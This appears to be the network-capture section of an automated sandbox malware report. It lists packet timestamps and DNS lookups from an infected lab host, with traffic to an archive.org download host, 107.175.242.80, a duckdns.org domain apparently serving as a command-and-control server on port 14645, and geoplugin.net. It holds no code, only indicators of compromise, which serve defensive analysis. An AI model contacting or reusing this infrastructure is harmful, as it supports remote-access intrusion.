                                                                Oct 7, 2024 22:41:14.350424051 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350440025 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350497007 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350511074 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350522995 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350536108 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350549936 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350559950 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350559950 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350589037 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350790024 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350806952 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350821018 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350835085 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350838900 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350851059 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.350862026 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350898027 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350976944 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351094961 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351109028 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351121902 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351134062 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351141930 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351149082 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351149082 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351165056 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351182938 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351196051 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351221085 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351541042 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351558924 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351572990 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351588011 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351599932 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351603031 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351617098 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351628065 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351630926 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351645947 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351650000 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351661921 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351676941 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351686954 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351716042 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.351965904 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351984024 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.351999998 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352025032 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352103949 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352118015 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352132082 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352145910 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352148056 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352160931 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352180958 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352184057 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352195978 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352205038 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352210999 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352226019 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352238894 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352240086 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352253914 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352264881 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352269888 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352292061 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.352967978 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352986097 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.352997065 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353007078 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353017092 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353023052 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353028059 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353038073 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353050947 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353065014 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353065968 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353079081 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353087902 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353091955 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353102922 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353112936 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353117943 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353126049 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353127003 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353137016 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353147984 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353161097 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353161097 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353184938 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353719950 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353732109 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353744984 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353758097 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353768110 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353771925 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353786945 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353796005 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353800058 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353811026 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353823900 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353825092 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353837967 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353846073 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.353854895 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.353878021 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354517937 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354532957 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354546070 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354558945 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354569912 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354572058 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354584932 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354594946 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354603052 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354609013 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354619026 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354624033 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354635954 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354649067 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354654074 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354660988 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354671001 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354675055 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354682922 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354688883 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354697943 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354711056 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.354716063 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.354748011 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355309010 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355320930 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355333090 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355345964 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355355978 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355360031 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355375051 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355389118 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355422974 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355555058 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355570078 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355581045 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355592966 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355602026 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355607033 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355619907 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355633974 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355638981 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355649948 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355664968 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355678082 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355679035 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355695009 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.355706930 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.355742931 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.356159925 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356184959 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356209040 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356230974 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356236935 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.356254101 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356275082 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356277943 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.356301069 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.356323957 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437170982 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437192917 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437218904 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437233925 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437257051 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437272072 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437314034 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437376976 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437400103 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437414885 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437450886 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437450886 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437464952 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437479973 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437493086 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437496901 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437508106 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437529087 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437695026 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437712908 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437728882 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437740088 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437761068 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437839031 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437853098 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437865019 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437880039 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.437886000 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.437911034 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438103914 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438126087 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438143969 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438158035 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438167095 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438174009 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438188076 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438194990 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438201904 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438215971 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438222885 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438252926 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438483000 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438498020 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438538074 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438621998 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438636065 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438649893 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438669920 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438669920 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438687086 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438699007 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438709021 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438713074 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438726902 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438733101 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438741922 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438755989 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438760996 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438772917 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438786030 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438792944 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.438801050 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.438822031 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.439395905 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439414024 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439428091 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439440012 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439440966 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.439450979 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439462900 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.439464092 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439477921 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439486027 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.439491987 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439507008 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439512014 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.439522028 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439527988 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439533949 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439538956 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439544916 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.439593077 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.521352053 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.718961000 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:15.398499012 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:15.751238108 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:15.756426096 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:15.756486893 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:15.768738031 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:15.773571968 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:16.272830963 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:16.402245045 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:16.402302980 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:16.405756950 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:16.410705090 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:16.410769939 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:16.415755033 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:16.672914028 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:16.722728968 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:16.727857113 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:17.195142031 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:17.252130032 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:41:17.257076025 CEST8049165178.237.33.50192.168.2.22
                                                                Oct 7, 2024 22:41:17.257353067 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:41:17.257353067 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:41:17.263032913 CEST8049165178.237.33.50192.168.2.22
                                                                Oct 7, 2024 22:41:17.426624060 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:17.426686049 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:17.891160011 CEST8049165178.237.33.50192.168.2.22
                                                                Oct 7, 2024 22:41:17.891226053 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:41:17.897769928 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:17.903995037 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:18.891007900 CEST8049165178.237.33.50192.168.2.22
                                                                Oct 7, 2024 22:41:18.891443014 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:41:33.159517050 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:41:33.161274910 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:41:33.166399002 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:42:03.287636042 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:42:03.290128946 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:42:03.297702074 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:42:32.891685963 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:42:33.181895971 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:42:33.186806917 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:42:33.191610098 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:42:33.281141996 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:42:33.889540911 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:42:35.137545109 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:42:37.586751938 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:42:42.469675064 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:42:52.126066923 CEST4916580192.168.2.22178.237.33.50
                                                                Oct 7, 2024 22:43:03.425894022 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:43:03.427419901 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:43:03.432416916 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:43:33.224756002 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:43:33.419513941 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:43:33.421818018 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:43:33.426618099 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:44:03.228452921 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:44:03.231178045 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:44:03.236191988 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:44:33.234044075 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:44:33.235996008 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:44:33.240925074 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:45:03.240257978 CEST1464549164192.210.214.9192.168.2.22
                                                                Oct 7, 2024 22:45:03.242175102 CEST4916414645192.168.2.22192.210.214.9
                                                                Oct 7, 2024 22:45:03.247107983 CEST1464549164192.210.214.9192.168.2.22
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 7, 2024 22:41:09.623537064 CEST5456253192.168.2.228.8.8.8
                                                                Oct 7, 2024 22:41:09.633522987 CEST53545628.8.8.8192.168.2.22
                                                                Oct 7, 2024 22:41:15.628922939 CEST5291753192.168.2.228.8.8.8
                                                                Oct 7, 2024 22:41:15.727037907 CEST53529178.8.8.8192.168.2.22
                                                                Oct 7, 2024 22:41:17.240138054 CEST6275153192.168.2.228.8.8.8
                                                                Oct 7, 2024 22:41:17.249162912 CEST53627518.8.8.8192.168.2.22
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 7, 2024 22:41:09.623537064 CEST192.168.2.228.8.8.80xe8c3Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 22:41:15.628922939 CEST192.168.2.228.8.8.80x91c0Standard query (0)2024remcmon.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 7, 2024 22:41:17.240138054 CEST192.168.2.228.8.8.80x1e07Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 7, 2024 22:41:09.633522987 CEST8.8.8.8192.168.2.220xe8c3No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 22:41:15.727037907 CEST8.8.8.8192.168.2.220x91c0No error (0)2024remcmon.duckdns.org192.210.214.9A (IP address)IN (0x0001)false
                                                                Oct 7, 2024 22:41:17.249162912 CEST8.8.8.8192.168.2.220x1e07No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                • ia600100.us.archive.org
                                                                • 107.175.242.80
                                                                • geoplugin.net
